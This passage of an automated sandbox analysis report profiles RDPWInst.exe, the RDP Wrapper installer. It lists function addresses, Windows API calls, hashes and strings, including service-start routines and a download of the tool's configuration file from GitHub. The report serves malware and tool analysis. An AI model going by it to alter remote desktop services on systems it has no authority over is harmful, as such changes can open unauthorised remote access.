                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                                                                              • Instruction ID: 32e31081b98e7b24079041a639207f5f8240b3ca2c27c4b0157ee02f81a1b514
                                                                                                              • Opcode Fuzzy Hash: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                                                                              • Instruction Fuzzy Hash: 99E0C2A3B4072036F63072AD4C82FAB9158CB867B4F470336FA50FB2D2C0999C0241AC
                                                                                                              Function 0040F6C0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040F6D4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3934441357-0
                                                                                                              • Opcode ID: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                                                                              • Instruction ID: 3fe4e569543b3f1381ab86603454923b4de8c4718f21568c98d02def12c07fd2
                                                                                                              • Opcode Fuzzy Hash: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                                                                              • Instruction Fuzzy Hash: 42D05BB63082507AD220D55B5C44DAB6BDCDBC5771F10063FB658C31C0D6308C05C275
                                                                                                              Function 0043A644 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetNativeSystemInfo.KERNEL32 ref: 0043A648
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoNativeSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 1721193555-0
                                                                                                              • Opcode ID: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                                                                              • Instruction ID: fbf5644ea725b9a19c2d11835783dba3dfebd9b236010a27cc61b97838af9c82
                                                                                                              • Opcode Fuzzy Hash: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                                                                              • Instruction Fuzzy Hash: 66E086584BC14148C60523354C2F7A32688832A324F4D2923C4D985262E25FC0B77BAF
                                                                                                              Function 0040F7C4 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNEL32(00000000,00447324,0043D137,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F7CF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                                                                              • Instruction ID: dfbd20c989cc919aa742ea809a195094cafabb968b5a4f056a7cb7a67f60922a
                                                                                                              • Opcode Fuzzy Hash: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                                                                              • Instruction Fuzzy Hash: F3C08CA03012000AEE30B1BD1DCA80B02884A0D2383A02A37F069F3AD3D23E886F201A
                                                                                                              Function 0040FB5C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000001,0040F8C6,00000000,0040F8EB,?,00447324,00000000,00000000,00000000,00000000,?,0043D15F,00000000,0043D55E), ref: 0040FB69
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateDirectory
                                                                                                              • String ID:
                                                                                                              • API String ID: 4241100979-0
                                                                                                              • Opcode ID: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                                                                              • Instruction ID: 5428b92e23564d17d1f876684be8f9c2b3243abbeaf0de8523baba27188e832a
                                                                                                              • Opcode Fuzzy Hash: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                                                                              • Instruction Fuzzy Hash: 40B092927543401AEA0035FA0CC6F2A418CD70960AF110C3ABA42E7183D47FC8290026
                                                                                                              Function 00409310 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrcpynW.KERNEL32(?,00000000,?,00000000,004093AD,?,?,?,00000000), ref: 0040937A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: lstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 97706510-0
                                                                                                              • Opcode ID: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                                                                              • Instruction ID: 1f383253a52e48d77bc15eb4822a33d834d352bf49a326ca98ed7cc47a11fc89
                                                                                                              • Opcode Fuzzy Hash: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                                                                              • Instruction Fuzzy Hash: 0111C671504204EFDF21DB69CC86B9A77F8EB19754F5100BAFC40AB2D2D7B8AD008A19
                                                                                                              Function 00402AB2 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402AE3
                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00402B06
                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00402B13
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$Free$Query
                                                                                                              • String ID:
                                                                                                              • API String ID: 778034434-0
                                                                                                              • Opcode ID: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                                                                              • Instruction ID: e8ddcf902efd7f78c833b1da2340b8221ccc6e4d64c13544335dcfda98f803ee
                                                                                                              • Opcode Fuzzy Hash: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                                                                              • Instruction Fuzzy Hash: 0CF06D343046005FD311CB19CA89B17BBE5EFC9350F15C17AE988973E5E675DC019B9A

                                                                                                              Non-executed Functions

                                                                                                              Function 0043B58C Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 107serviceCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                                              • GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                                                • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                                                • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B61F
                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B62E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Service$CloseErrorHandleLastOpen$Manager
                                                                                                              • String ID: $sD$...$OpenSCManager$OpenService$ServicesActive$StartService$[*] Starting
                                                                                                              • API String ID: 2257214823-3855835416
                                                                                                              • Opcode ID: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                                                                              • Instruction ID: 0e693e6e1cec2ac2fe46a8ff9d209bc722a6061919d6bcedfcc5fc96e321ed9b
                                                                                                              • Opcode Fuzzy Hash: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                                                                              • Instruction Fuzzy Hash: 6C313471A04208AEDB10FBB68842B5F77E8DB4C715F60947BF614E7283DB7C9940869E
                                                                                                              Function 0043CF60 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 70networkfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InternetOpenW.WININET(RDP Wrapper Update,00000000,00000000,00000000,00000000), ref: 0043CF9B
                                                                                                              • InternetOpenUrlW.WININET(00000000,https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini,00000000,00000000,80000000,00000000), ref: 0043CFB7
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0043CFC3
                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0043CFDB
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0043D002
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0043D008
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Internet$CloseHandle$Open$FileRead
                                                                                                              • String ID: $sD$RDP Wrapper Update$https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                                                                                                              • API String ID: 4294395943-3115740878
                                                                                                              • Opcode ID: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                                                                              • Instruction ID: c5d90ac50beae541ecf0d1101a3828864360ef58c633fc88e2a86ac238cf1af1
                                                                                                              • Opcode Fuzzy Hash: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                                                                              • Instruction Fuzzy Hash: B611EC30A40204BAE725DB629C52F5E73B99B5CB08F21907AF500B61C1DAFC6D15965E
                                                                                                              Function 00408EB9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81stringfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E8B
                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E9E
                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EB4
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EC0
                                                                                                              • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?), ref: 00408EFC
                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00408F08
                                                                                                              • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00408F2B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: lstrcpyn$Findlstrlen$CloseFileFirst
                                                                                                              • String ID: \
                                                                                                              • API String ID: 426534248-2967466578
                                                                                                              • Opcode ID: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                                                                              • Instruction ID: b362d454dc0c99aa6135db0f351dbab6b5904c2f5f97e8c1ae29e40b3cae7ae2
                                                                                                              • Opcode Fuzzy Hash: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                                                                              • Instruction Fuzzy Hash: 2921DA72A005195BCB10EAA4CD89BEF736DEB84314F0845BBA554E32C1EA7CEA458B58
                                                                                                              Function 00408908 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsValidLocale.KERNEL32(?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089B4
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089D0
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Locale$Info$Valid
                                                                                                              • String ID:
                                                                                                              • API String ID: 1826331170-0
                                                                                                              • Opcode ID: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                                              • Instruction ID: a5145651339b4fb3455c536bf826b1f6d015bb6bedb64d7d22cca76e959b3329
                                                                                                              • Opcode Fuzzy Hash: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                                              • Instruction Fuzzy Hash: 4031C274A00618ABDF20EB55DD81BAF77B5EB44700F1040BBA588B72D1DA7D5E40CF5A
                                                                                                              Function 00414698 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetVersionExW.KERNEL32(?,00443136,00000000,0044315A), ref: 004146A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Version
                                                                                                              • String ID: 8[D
                                                                                                              • API String ID: 1889659487-4257705004
                                                                                                              • Opcode ID: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                                              • Instruction ID: 2f0940f951a798b0a8c1b92e6229d48fd5c0b6d32f60b1d075f360ba34157daa
                                                                                                              • Opcode Fuzzy Hash: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                                              • Instruction Fuzzy Hash: 7DF030B8605B419FDB00DF18E845659B7E0EB89314F00483AF485D7391D738A844CB6E
                                                                                                              Function 0040F73C Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000), ref: 0040F757
                                                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000), ref: 0040F762
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 2295610775-0
                                                                                                              • Opcode ID: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                                              • Instruction ID: 44d6f2536772e544dca19d4554f13a915e571bc99722c0a0b507a91726501656
                                                                                                              • Opcode Fuzzy Hash: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                                              • Instruction Fuzzy Hash: B9E0CD6261470815C72065B90CC9B5B728C5B04328F040BB77D5CF35D2FA3D8554115F
                                                                                                              Function 0040FAE8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0040FB09
                                                                                                              Memory Dump Source
